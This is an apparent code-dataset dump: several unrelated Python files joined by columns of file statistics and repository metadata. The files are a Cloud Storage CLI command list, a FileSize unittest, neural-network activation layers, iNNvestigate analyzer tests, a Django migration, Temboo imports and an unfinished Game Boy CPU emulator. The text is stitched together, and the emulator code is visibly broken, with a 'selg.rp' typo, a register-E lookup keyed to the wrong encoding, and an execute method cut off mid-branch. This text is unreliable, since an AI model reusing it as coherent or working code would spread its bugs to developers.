  appcommands.AddCmd('buckets_delete', BucketsDelete)
  appcommands.AddCmd('buckets_get', BucketsGet)
  appcommands.AddCmd('buckets_getIamPolicy', BucketsGetIamPolicy)
  appcommands.AddCmd('buckets_insert', BucketsInsert)
  appcommands.AddCmd('buckets_list', BucketsList)
  appcommands.AddCmd('buckets_patch', BucketsPatch)
  appcommands.AddCmd('buckets_setIamPolicy', BucketsSetIamPolicy)
  appcommands.AddCmd('buckets_testIamPermissions', BucketsTestIamPermissions)
  appcommands.AddCmd('buckets_update', BucketsUpdate)
  appcommands.AddCmd('channels_stop', ChannelsStop)
  appcommands.AddCmd('defaultObjectAccessControls_delete', DefaultObjectAccessControlsDelete)
  appcommands.AddCmd('defaultObjectAccessControls_get', DefaultObjectAccessControlsGet)
  appcommands.AddCmd('defaultObjectAccessControls_insert', DefaultObjectAccessControlsInsert)
  appcommands.AddCmd('defaultObjectAccessControls_list', DefaultObjectAccessControlsList)
  appcommands.AddCmd('defaultObjectAccessControls_patch', DefaultObjectAccessControlsPatch)
  appcommands.AddCmd('defaultObjectAccessControls_update', DefaultObjectAccessControlsUpdate)
  appcommands.AddCmd('notifications_delete', NotificationsDelete)
  appcommands.AddCmd('notifications_get', NotificationsGet)
  appcommands.AddCmd('notifications_insert', NotificationsInsert)
  appcommands.AddCmd('notifications_list', NotificationsList)
  appcommands.AddCmd('objectAccessControls_delete', ObjectAccessControlsDelete)
  appcommands.AddCmd('objectAccessControls_get', ObjectAccessControlsGet)
  appcommands.AddCmd('objectAccessControls_insert', ObjectAccessControlsInsert)
  appcommands.AddCmd('objectAccessControls_list', ObjectAccessControlsList)
  appcommands.AddCmd('objectAccessControls_patch', ObjectAccessControlsPatch)
  appcommands.AddCmd('objectAccessControls_update', ObjectAccessControlsUpdate)
  appcommands.AddCmd('objects_compose', ObjectsCompose)
  appcommands.AddCmd('objects_copy', ObjectsCopy)
  appcommands.AddCmd('objects_delete', ObjectsDelete)
  appcommands.AddCmd('objects_get', ObjectsGet)
  appcommands.AddCmd('objects_getIamPolicy', ObjectsGetIamPolicy)
  appcommands.AddCmd('objects_insert', ObjectsInsert)
  appcommands.AddCmd('objects_list', ObjectsList)
  appcommands.AddCmd('objects_patch', ObjectsPatch)
  appcommands.AddCmd('objects_rewrite', ObjectsRewrite)
  appcommands.AddCmd('objects_setIamPolicy', ObjectsSetIamPolicy)
  appcommands.AddCmd('objects_testIamPermissions', ObjectsTestIamPermissions)
  appcommands.AddCmd('objects_update', ObjectsUpdate)
  appcommands.AddCmd('objects_watchAll', ObjectsWatchAll)
  apitools_base_cli.SetupLogger()
  # Older appcommands releases lack SetDefaultCommand; guard for both.
  if hasattr(appcommands, 'SetDefaultCommand'):
    appcommands.SetDefaultCommand('pyshell')
# Re-export run_main so a console_scripts entry point can launch this CLI.
run_main = apitools_base_cli.run_main
if __name__ == '__main__':
  appcommands.Run()
| 40.032132
| 155
| 0.692619
| 16,220
| 143,275
| 6.030148
| 0.042047
| 0.025529
| 0.028576
| 0.031285
| 0.852825
| 0.845617
| 0.828697
| 0.785899
| 0.7709
| 0.752845
| 0
| 0.002146
| 0.222767
| 143,275
| 3,578
| 156
| 40.04332
| 0.876183
| 0.000607
| 0
| 0.753309
| 1
| 0
| 0.290392
| 0.038627
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.006017
| 0.004813
| null | null | 0.018452
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
cc0fe701e6783f9ade885ccfa0991a893ed95182
| 3,447
|
py
|
Python
|
TestFileSize_set_get.py
|
ytyaru/Python.FileSize.201702071138
|
569c45d5e9b91befbaece50520eb69955e148c65
|
[
"CC0-1.0"
] | null | null | null |
TestFileSize_set_get.py
|
ytyaru/Python.FileSize.201702071138
|
569c45d5e9b91befbaece50520eb69955e148c65
|
[
"CC0-1.0"
] | 6
|
2017-02-09T00:54:50.000Z
|
2017-02-09T10:56:13.000Z
|
TestFileSize_set_get.py
|
ytyaru/Python.FileSize.201702071138
|
569c45d5e9b91befbaece50520eb69955e148c65
|
[
"CC0-1.0"
] | null | null | null |
import unittest
import FileSize
from decimal import Decimal
class TestFileSize_set_get(unittest.TestCase):
    """Tests FileSize's bytes-per-unit validation and unit-metadata getters.

    FileSize accepts only 1000 (SI) or 1024 (binary prefix) for
    byte_size_of_unit; any other value must raise with a descriptive
    Japanese message. The original test bodies were copy-pasted fourteen
    times; the shared setup now lives in two private helpers, while every
    public test method (the interface unittest discovers) is unchanged.
    """

    def _assert_invalid_unit(self, unit):
        """Assert that constructing FileSize with `unit` raises the exact message."""
        with self.assertRaises(Exception) as e:
            self.__target = FileSize.FileSize(byte_size_of_unit=unit)
        self.assertEqual(
            '単位あたりのByte数は1000または1024のみ有効です。無効値: {0}'.format(unit),
            e.exception.args[0])

    def _make(self, unit):
        """Build and return a FileSize configured with the given bytes-per-unit."""
        self.__target = FileSize.FileSize(byte_size_of_unit=unit)
        return self.__target

    # --- validation: only 1000 and 1024 are legal, so probe both neighbours ---

    def test_set_unit_999(self):
        self._assert_invalid_unit(999)

    def test_set_unit_1001(self):
        self._assert_invalid_unit(1001)

    def test_set_unit_1023(self):
        self._assert_invalid_unit(1023)

    def test_set_unit_1025(self):
        self._assert_invalid_unit(1025)

    # --- unit-metadata getters for the two legal unit sizes ---

    def test_get_unit_name_B(self):
        self.assertEqual(self._make(1000).GetByteOfUnitName(), "B")

    def test_get_unit_name_iB(self):
        self.assertEqual(self._make(1024).GetByteOfUnitName(), "iB")

    def test_get_unit_full_name_Byte(self):
        self.assertEqual(self._make(1000).GetByteOfUnitFullName(), "Byte")

    def test_get_unit_full_name_iByte(self):
        self.assertEqual(self._make(1024).GetByteOfUnitFullName(), "iByte")

    def test_get_standard_name_english_1000(self):
        self.assertEqual(
            self._make(1000).GetByteOfUnitStandardName_English(), "SI")

    def test_get_standard_name_english_1024(self):
        self.assertEqual(
            self._make(1024).GetByteOfUnitStandardName_English(), "BinaryPrefix")

    def test_get_standard_name_japanese_1000(self):
        self.assertEqual(
            self._make(1000).GetByteOfUnitStandardName_Japanese(), "国際単位系")

    def test_get_standard_name_japanese_1024(self):
        self.assertEqual(
            self._make(1024).GetByteOfUnitStandardName_Japanese(), "2進接頭辞")

    def test_get_unit_description_1000(self):
        self.assertEqual(
            self._make(1000).GetByteOfUnitDescription(),
            "https://ja.wikipedia.org/wiki/%E5%9B%BD%E9%9A%9B%E5%8D%98%E4%BD%8D%E7%B3%BB")

    def test_get_unit_description_1024(self):
        self.assertEqual(
            self._make(1024).GetByteOfUnitDescription(),
            "https://ja.wikipedia.org/wiki/2%E9%80%B2%E6%8E%A5%E9%A0%AD%E8%BE%9E")
| 48.549296
| 145
| 0.709022
| 436
| 3,447
| 5.252294
| 0.181193
| 0.104803
| 0.110044
| 0.158952
| 0.89607
| 0.861572
| 0.79083
| 0.79083
| 0.720961
| 0.720961
| 0
| 0.056597
| 0.179867
| 3,447
| 70
| 146
| 49.242857
| 0.753449
| 0
| 0
| 0.5
| 0
| 0.03125
| 0.095763
| 0.039466
| 0
| 0
| 0
| 0
| 0.28125
| 1
| 0.21875
| false
| 0
| 0.046875
| 0
| 0.28125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cc182e70e9b8ed39660535959cc9f523b237486a
| 2,987
|
py
|
Python
|
project2/activation.py
|
Shanci-Li/DL_project
|
b13a6f687c5aa2be8e197246315817c76de6e33a
|
[
"MIT"
] | null | null | null |
project2/activation.py
|
Shanci-Li/DL_project
|
b13a6f687c5aa2be8e197246315817c76de6e33a
|
[
"MIT"
] | null | null | null |
project2/activation.py
|
Shanci-Li/DL_project
|
b13a6f687c5aa2be8e197246315817c76de6e33a
|
[
"MIT"
] | null | null | null |
from helpers import Module
import torch
# implements of activation layer: Relu and Tanh
class Relu(Module):
    """ReLU activation layer.

    forward() caches the pre-activation input so that backward() can
    compute the point-wise derivative of the activation.
    """

    def __init__(self):
        super().__init__()
        # Cached pre-activation (s) and activation (x) from the last forward pass.
        self.s = 0
        self.x = 0

    def forward(self, inputs):
        # x = sigma(s): clamp negative entries to zero.
        self.s = inputs
        self.x = inputs.clamp(min=0)
        return self.x

    def backward(self, grad_wrt_output):
        # dl/ds = dl/dx * sigma'(s). sign().clamp(min=0) produces the 0/1
        # mask (1 where s > 0) in the same dtype as the cached input.
        derivative = self.s.sign().clamp(min=0)
        return grad_wrt_output.mul(derivative)

    def param(self):
        """Return (parameter, gradient) pairs; empty placeholders for ReLU."""
        return [(None, None)]

    def moment(self):
        """Per-layer state for momentum updates; none for this layer."""
        return [(None, None, None)]

    def adam(self):
        """Per-layer state for Adam updates; none for this layer."""
        return [(None, None, None, None, None)]
class Tanh(Module):
    """Hyperbolic-tangent activation layer.

    forward() caches both the pre-activation input and the activation
    output so backward() can compute the local derivative cheaply.
    """

    def __init__(self):
        super().__init__()
        self.s = 0  # cached pre-activation input
        self.x = 0  # cached activation output tanh(s)

    def forward(self, inputs):
        """Apply tanh element-wise, caching input and output."""
        self.s = inputs
        self.x = self.s.tanh()
        return self.x

    def backward(self, grad_wrt_output):
        """Return dl/ds = dl/dx * sigma'(s), with sigma'(s) = 1 - tanh(s)^2.

        Reuses the cached output self.x (= tanh(s)) instead of recomputing
        tanh(s), matching how Sigmoid.backward uses its cached output.
        """
        d_sigma_s = 1 - self.x ** 2
        return grad_wrt_output * d_sigma_s

    def param(self):
        """Parameterless layer: placeholder (parameter, gradient) pair."""
        return [(None, None)]

    def moment(self):
        """Placeholder state for momentum-based weight updates."""
        return [(None, None, None)]

    def adam(self):
        """Placeholder state for Adam weight updates."""
        return [(None, None, None, None, None)]
class Sigmoid(Module):
    """Logistic-sigmoid activation layer."""

    def __init__(self):
        super().__init__()
        self.s = 0  # cached pre-activation input
        self.x = 0  # cached activation output sigmoid(s)

    def forward(self, inputs):
        """Apply the sigmoid element-wise, caching input and output."""
        self.s = inputs
        self.x = torch.sigmoid(inputs)
        return self.x

    def backward(self, grad_wrt_output):
        """Return dl/ds using sigma'(s) = sigma(s) * (1 - sigma(s))."""
        local_grad = self.x * (1 - self.x)
        return local_grad * grad_wrt_output

    def param(self):
        """Parameterless layer: placeholder (parameter, gradient) pair."""
        return [(None, None)]

    def moment(self):
        """Placeholder state for momentum-based weight updates."""
        return [(None, None, None)]

    def adam(self):
        """Placeholder state for Adam weight updates."""
        return [(None, None, None, None, None)]
| 25.529915
| 104
| 0.553398
| 406
| 2,987
| 3.921182
| 0.182266
| 0.105528
| 0.090452
| 0.067839
| 0.770101
| 0.766332
| 0.751884
| 0.751884
| 0.751884
| 0.72299
| 0
| 0.006983
| 0.328758
| 2,987
| 116
| 105
| 25.75
| 0.787032
| 0.344158
| 0
| 0.803571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.321429
| false
| 0
| 0.035714
| 0.142857
| 0.678571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
f0b0b5360397f703bb5e02d91c70f7a8cd50eec9
| 280
|
py
|
Python
|
temboo/core/Library/Google/ComputeEngine/Zones/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/Google/ComputeEngine/Zones/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/Google/ComputeEngine/Zones/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
from temboo.Library.Google.ComputeEngine.Zones.GetZone import GetZone, GetZoneInputSet, GetZoneResultSet, GetZoneChoreographyExecution
from temboo.Library.Google.ComputeEngine.Zones.ListZones import ListZones, ListZonesInputSet, ListZonesResultSet, ListZonesChoreographyExecution
| 93.333333
| 144
| 0.892857
| 24
| 280
| 10.416667
| 0.625
| 0.08
| 0.136
| 0.184
| 0.328
| 0.328
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05
| 280
| 2
| 145
| 140
| 0.93985
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f0b44604dbcd733a792038e5616faa760ab83f73
| 5,403
|
py
|
Python
|
innvestigate/tests/analyzer/test_gradient_based.py
|
rtygbwwwerr/innvestigate
|
de6d9a191d969a542ab1f7ab3fb615ede10c7362
|
[
"MIT"
] | 2
|
2019-12-19T08:07:28.000Z
|
2020-03-12T02:57:55.000Z
|
innvestigate/tests/analyzer/test_gradient_based.py
|
rtygbwwwerr/innvestigate
|
de6d9a191d969a542ab1f7ab3fb615ede10c7362
|
[
"MIT"
] | null | null | null |
innvestigate/tests/analyzer/test_gradient_based.py
|
rtygbwwwerr/innvestigate
|
de6d9a191d969a542ab1f7ab3fb615ede10c7362
|
[
"MIT"
] | 1
|
2020-11-06T01:52:28.000Z
|
2020-11-06T01:52:28.000Z
|
# Begin: Python 2/3 compatibility header small
# Get Python 3 functionality:
from __future__ import\
absolute_import, print_function, division, unicode_literals
from future.utils import raise_with_traceback, raise_from
# catch exception with: except Exception as e
from builtins import range, map, zip, filter
from io import open
import six
# End: Python 2/3 compatability header small
###############################################################################
###############################################################################
###############################################################################
import pytest
from innvestigate.utils.tests import dryrun
from innvestigate.analyzer import BaselineGradient
from innvestigate.analyzer import Gradient
from innvestigate.analyzer import Deconvnet
from innvestigate.analyzer import GuidedBackprop
from innvestigate.analyzer import IntegratedGradients
from innvestigate.analyzer import SmoothGrad
###############################################################################
###############################################################################
###############################################################################
@pytest.mark.fast
@pytest.mark.precommit
def test_fast__BaselineGradient():
    """Dry-run BaselineGradient on the trivial and MNIST log-reg networks."""
    dryrun.test_analyzer(lambda model: BaselineGradient(model), "trivia.*:mnist.log_reg")
@pytest.mark.precommit
def test_precommit__BaselineGradient():
    """Dry-run BaselineGradient on all MNIST networks."""
    dryrun.test_analyzer(lambda model: BaselineGradient(model), "mnist.*")
@pytest.mark.slow
@pytest.mark.application
@pytest.mark.imagenet
def test_imagenet__BaselineGradient():
    """Dry-run BaselineGradient on the ImageNet networks."""
    dryrun.test_analyzer(lambda model: BaselineGradient(model), "imagenet.*")
@pytest.mark.fast
@pytest.mark.precommit
def test_fast__Gradient():
    """Dry-run Gradient on the trivial and MNIST log-reg networks."""
    dryrun.test_analyzer(lambda model: Gradient(model), "trivia.*:mnist.log_reg")
@pytest.mark.precommit
def test_precommit__Gradient():
    """Dry-run Gradient on all MNIST networks."""
    dryrun.test_analyzer(lambda model: Gradient(model), "mnist.*")
@pytest.mark.slow
@pytest.mark.application
@pytest.mark.imagenet
def test_imagenet__Gradient():
    """Dry-run Gradient on the ImageNet networks."""
    dryrun.test_analyzer(lambda model: Gradient(model), "imagenet.*")
###############################################################################
###############################################################################
###############################################################################
@pytest.mark.fast
@pytest.mark.precommit
def test_fast__Deconvnet():
    """Dry-run Deconvnet on the trivial and MNIST log-reg networks."""
    dryrun.test_analyzer(lambda model: Deconvnet(model), "trivia.*:mnist.log_reg")
@pytest.mark.precommit
def test_precommit__Deconvnet():
    """Dry-run Deconvnet on all MNIST networks."""
    dryrun.test_analyzer(lambda model: Deconvnet(model), "mnist.*")
@pytest.mark.slow
@pytest.mark.application
@pytest.mark.imagenet
def test_imagenet__Deconvnet():
    """Dry-run Deconvnet on the ImageNet networks."""
    dryrun.test_analyzer(lambda model: Deconvnet(model), "imagenet.*")
@pytest.mark.fast
@pytest.mark.precommit
def test_fast__GuidedBackprop():
    """Dry-run GuidedBackprop on the trivial and MNIST log-reg networks."""
    dryrun.test_analyzer(lambda model: GuidedBackprop(model), "trivia.*:mnist.log_reg")
@pytest.mark.precommit
def test_precommit__GuidedBackprop():
    """Dry-run GuidedBackprop on all MNIST networks."""
    dryrun.test_analyzer(lambda model: GuidedBackprop(model), "mnist.*")
@pytest.mark.slow
@pytest.mark.application
@pytest.mark.imagenet
def test_imagenet__GuidedBackprop():
    """Dry-run GuidedBackprop on the ImageNet networks."""
    dryrun.test_analyzer(lambda model: GuidedBackprop(model), "imagenet.*")
###############################################################################
###############################################################################
###############################################################################
@pytest.mark.fast
@pytest.mark.precommit
def test_fast__IntegratedGradients():
    """Dry-run IntegratedGradients on the trivial and MNIST log-reg networks."""
    dryrun.test_analyzer(lambda model: IntegratedGradients(model), "trivia.*:mnist.log_reg")
@pytest.mark.precommit
def test_precommit__IntegratedGradients():
    """Dry-run IntegratedGradients on all MNIST networks."""
    dryrun.test_analyzer(lambda model: IntegratedGradients(model), "mnist.*")
@pytest.mark.slow
@pytest.mark.application
@pytest.mark.imagenet
def test_imagenet__IntegratedGradients():
    """Dry-run IntegratedGradients (2 steps, for speed) on the ImageNet networks."""
    dryrun.test_analyzer(lambda model: IntegratedGradients(model, steps=2), "imagenet.*")
###############################################################################
###############################################################################
###############################################################################
@pytest.mark.fast
@pytest.mark.precommit
def test_fast__SmoothGrad():
    """Dry-run SmoothGrad on the trivial and MNIST log-reg networks."""
    dryrun.test_analyzer(lambda model: SmoothGrad(model), "trivia.*:mnist.log_reg")
@pytest.mark.precommit
def test_precommit__SmoothGrad():
    """Dry-run SmoothGrad on all MNIST networks."""
    dryrun.test_analyzer(lambda model: SmoothGrad(model), "mnist.*")
@pytest.mark.slow
@pytest.mark.application
@pytest.mark.imagenet
def test_imagenet__SmoothGrad():
    """Dry-run SmoothGrad (2 augmentations, for speed) on the ImageNet networks."""
    dryrun.test_analyzer(lambda model: SmoothGrad(model, augment_by_n=2), "imagenet.*")
| 23.288793
| 79
| 0.577087
| 497
| 5,403
| 6.092555
| 0.134809
| 0.11889
| 0.083223
| 0.11889
| 0.793263
| 0.793263
| 0.782034
| 0.746367
| 0.746367
| 0.731836
| 0
| 0.001476
| 0.122339
| 5,403
| 231
| 80
| 23.38961
| 0.637073
| 0.029428
| 0
| 0.721311
| 0
| 0
| 0.057721
| 0.03256
| 0
| 0
| 0
| 0
| 0
| 1
| 0.295082
| false
| 0
| 0.114754
| 0.147541
| 0.557377
| 0.008197
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
f0e31e74359c3ea5619dccb81c099707f2ed1a87
| 3,379
|
py
|
Python
|
ktapp/migrations/0045_auto_20151112_0140.py
|
cu2/KT
|
8a0964b77dce150358637faa679d969a07e42f07
|
[
"CC-BY-3.0"
] | 5
|
2015-04-13T09:44:31.000Z
|
2017-10-19T01:07:58.000Z
|
ktapp/migrations/0045_auto_20151112_0140.py
|
cu2/KT
|
8a0964b77dce150358637faa679d969a07e42f07
|
[
"CC-BY-3.0"
] | 49
|
2015-02-15T07:12:05.000Z
|
2022-03-11T23:11:43.000Z
|
ktapp/migrations/0045_auto_20151112_0140.py
|
cu2/KT
|
8a0964b77dce150358637faa679d969a07e42f07
|
[
"CC-BY-3.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Drop the 25 per-bucket rating-count columns from UserUserRating."""

    dependencies = [
        ('ktapp', '0044_useruserrating_similarity'),
    ]

    # The removed fields form a 5x5 grid, number_of_ratings_11 .. _55;
    # the comprehension emits them in the same row-major order as the
    # original hand-written list.
    operations = [
        migrations.RemoveField(
            model_name='useruserrating',
            name='number_of_ratings_{0}{1}'.format(row, col),
        )
        for row in range(1, 6)
        for col in range(1, 6)
    ]
| 29.382609
| 52
| 0.560817
| 274
| 3,379
| 6.525547
| 0.186131
| 0.293624
| 0.363535
| 0.419463
| 0.880872
| 0.880872
| 0.880872
| 0.880872
| 0.880872
| 0
| 0
| 0.02473
| 0.341817
| 3,379
| 114
| 53
| 29.640351
| 0.779227
| 0.006215
| 0
| 0.694444
| 0
| 0
| 0.263707
| 0.008939
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.018519
| 0
| 0.046296
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0b1182e58436bdaad4a7f50a0b4dd43aa6d82fb6
| 33
|
py
|
Python
|
test/04.py
|
ipython-toolbox/nbconvert
|
183cbe2e094fb9ea03fc6f872bb2f6c88451b0fd
|
[
"MIT"
] | null | null | null |
test/04.py
|
ipython-toolbox/nbconvert
|
183cbe2e094fb9ea03fc6f872bb2f6c88451b0fd
|
[
"MIT"
] | null | null | null |
test/04.py
|
ipython-toolbox/nbconvert
|
183cbe2e094fb9ea03fc6f872bb2f6c88451b0fd
|
[
"MIT"
] | null | null | null |
import os
def func1():
    """No-op placeholder; returns None."""
    return None
| 6.6
| 12
| 0.606061
| 5
| 33
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.043478
| 0.30303
| 33
| 4
| 13
| 8.25
| 0.826087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
9bc68d017e17c2078882fc123291ef20dc9cce63
| 53,079
|
py
|
Python
|
cpu.py
|
NickTGraham/gameboy-py
|
b8d4b13416f3abe1bcb29a6e4ef055387bfc1955
|
[
"MIT"
] | null | null | null |
cpu.py
|
NickTGraham/gameboy-py
|
b8d4b13416f3abe1bcb29a6e4ef055387bfc1955
|
[
"MIT"
] | null | null | null |
cpu.py
|
NickTGraham/gameboy-py
|
b8d4b13416f3abe1bcb29a6e4ef055387bfc1955
|
[
"MIT"
] | null | null | null |
class Registers:
    """Hold the CPU registers and allow access individually and as 16-bit pairs.

    Single registers are addressed by their 3-bit instruction encoding
    (A=0b111, B=0b000, C=0b001, D=0b010, E=0b011, H=0b100, L=0b101) or,
    for f/pc/sp, by a string key. Pairs are addressed by string ("af",
    "bc", "de", "hl", "sp").
    """

    def __init__(self):
        # Easy references to the 3-bit encodings of each register.
        self.RegA = 0b111
        self.RegB = 0b000
        self.RegC = 0b001
        self.RegD = 0b010
        self.RegE = 0b011
        self.RegH = 0b100
        self.RegL = 0b101
        # 8-bit register values.
        self.a = 0
        self.b = 0
        self.c = 0
        self.d = 0
        self.e = 0
        self.f = 0  # flag register: z, n, h, cy live in bits 7..4 (see setFlag)
        self.h = 0
        self.l = 0
        # 16-bit registers with their post-boot values.
        self.pc = 0x0100
        self.sp = 0xFFFE
        self.cy = 0  # standalone carry scratch used by some callers

    def getReg(self, reg):
        """Return a single register value addressed by encoding or name.

        Raises KeyError for an unknown key.
        """
        return {
            0b111: self.a,
            0b000: self.b,
            0b001: self.c,
            0b010: self.d,
            # BUGFIX: E was keyed as 0b110 (the mem[HL] encoding); its real
            # encoding is 0b011, matching RegE and setReg below.
            0b011: self.e,
            "f": self.f,
            0b100: self.h,
            0b101: self.l,
            "pc": self.pc,
            "sp": self.sp
        }[reg]

    def getPair(self, pair):
        """Return a 16-bit register pair (high byte << 8 | low byte)."""
        return {
            "af": self.a << 8 | self.f,
            "bc": self.b << 8 | self.c,
            "de": self.d << 8 | self.e,
            "hl": self.h << 8 | self.l,
            "sp": self.sp
        }[pair]

    def setReg(self, reg, val):
        """Set a single register addressed by encoding or name.

        Unknown keys are silently ignored (original behavior preserved).
        """
        if (reg == 0b111):
            self.a = val
        elif (reg == 0b000):
            self.b = val
        elif (reg == 0b001):
            self.c = val
        elif (reg == 0b010):
            self.d = val
        elif (reg == 0b011):
            self.e = val
        elif (reg == "f"):
            self.f = val
        elif (reg == 0b100):
            self.h = val
        elif (reg == 0b101):
            self.l = val
        elif (reg == "sp"):
            self.sp = val
        elif (reg == "pc"):
            self.pc = val

    def setPair(self, pair, val):
        """Set a 16-bit register pair; low byte and high byte are split out.

        Note: "sp" is intentionally not handled here (original behavior).
        """
        if (pair == "af"):
            self.f = val & 0b11111111
            self.a = val >> 8
        elif (pair == "bc"):
            self.c = val & 0b11111111
            self.b = val >> 8
        elif (pair == "de"):
            self.e = val & 0b11111111
            self.d = val >> 8
        elif (pair == "hl"):
            self.l = val & 0b11111111
            self.h = val >> 8

    def setFlag(self, flag, val):
        """Set one flag bit in f: z=bit 7, n=bit 6, h=bit 5, cy=bit 4."""
        if(flag == "z"):
            mask = 0b01111111
            tmp = self.f & mask
            self.f = tmp | (val << 7)
        elif(flag == "n"):
            mask = 0b10111111
            tmp = self.f & mask
            self.f = tmp | (val << 6)
        elif(flag == "h"):
            mask = 0b11011111
            tmp = self.f & mask
            self.f = tmp | (val << 5)
        elif(flag == "cy"):
            mask = 0b11101111
            tmp = self.f & mask
            self.f = tmp | (val << 4)

    def getFlag(self, flag):
        """Return one flag bit (0 or 1) from f; None for an unknown flag name."""
        if(flag == "z"):
            mask = 0b10000000
            tmp = self.f & mask
            return tmp >> 7
        elif(flag == "n"):
            mask = 0b01000000
            tmp = self.f & mask
            return tmp >> 6
        elif(flag == "h"):
            mask = 0b00100000
            tmp = self.f & mask
            return tmp >> 5
        elif(flag == "cy"):
            mask = 0b00010000
            tmp = self.f & mask
            return tmp >> 4
class CPU():
"""Class contains the overall CPU Structure, including decoding the instructions"""
def __init__(self):
    # Register file (a..l, pc, sp, flags) shared by all instructions.
    self.reg = Registers()
    # Decoded fields of the current instruction (filled in by decode()).
    self.opcode = 0  # bits 7-6 of the instruction byte
    self.r = 0       # bits 5-3
    self.rp = 0      # bits 2-0
    self.n = 0       # full instruction byte, used as immediate operand
    self.inst = 0    # raw fetched byte
    # Main memory; Memory is defined elsewhere in the project.
    self.mem = Memory()
    # BCD-related scratch state -- purpose not evident from this chunk; TODO confirm
    self.bcd = 0
    self.bcdcy = 0
def fetch(self):
    """Load the byte at PC into self.inst and advance PC by one."""
    self.inst = self.mem.read(self.reg.pc)
    self.reg.pc += 1
def setInst(self, byte):
    """Inject an instruction byte directly, bypassing a memory fetch."""
    self.inst = byte
def decode(self):
    """Split self.inst into opcode (bits 7-6), r (bits 5-3), rp (bits 2-0), and n."""
    inst = self.inst
    self.opcode = (inst >> 6) & 0b11
    self.r = (inst >> 3) & 0b111
    self.rp = inst & 0b111
    self.n = inst  # kept whole in case the instruction needs an immediate
def execute(self):
#8-bit load instructions
if(self.opcode == 1 and self.r != 0b110 and self.rp != 0b110): #load instruction r <- rp
tmp = self.reg.getReg(self.rp)
self.reg.setReg(self.r, tmp)
elif(self.opcode == 1 and self.rp == 0b110): # r <- mem[HL]
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
self.reg.setReg(self.r, tmp)
elif(self.opcode == 1 and self.r == 0b110): #mem[HL] <- rp
memaddr = self.reg.getPair("hl")
tmp = self.reg.getReg(self.rp)
self.mem.write(memaddr, tmp)
elif(self.opcode == 0 and self.rp == 0b110 and self.r != 0b110): #r <- n
tmpreg = self.r
self.fetch() #pull next byte, updates PC along with it.
self.decode()
self.reg.setReg(tmpreg, self.n)
elif(self.opcode == 0 and self.r == 0b110 and self.rp == 0b110): #mem[HL] <- n
tmpreg = self.reg.getPair("hl")
self.fetch()
self.decode()
self.mem.write(tmpreg, self.n)
elif(self.opcode == 0 and self.r == 0b001 and self.rp == 0b010): #A <- mem[BC]
memaddr = self.reg.getPair("bc")
tmp = self.mem.read(memaddr)
self.reg.setReg(self.reg.RegA, tmp)
elif(self.opcode == 0 and self.r == 0b011 and selg.rp == 0b010): #A <- mem[DE]
memaddr = self.reg.getPair("de")
tmp = self.mem.read(memaddr)
self.reg.setReg(self.reg.RegA, tmp)
elif(self.opcode == 3 and self.r == 0b110 and self.rp == 0b010): #A <- mem[0xFF00 + C]
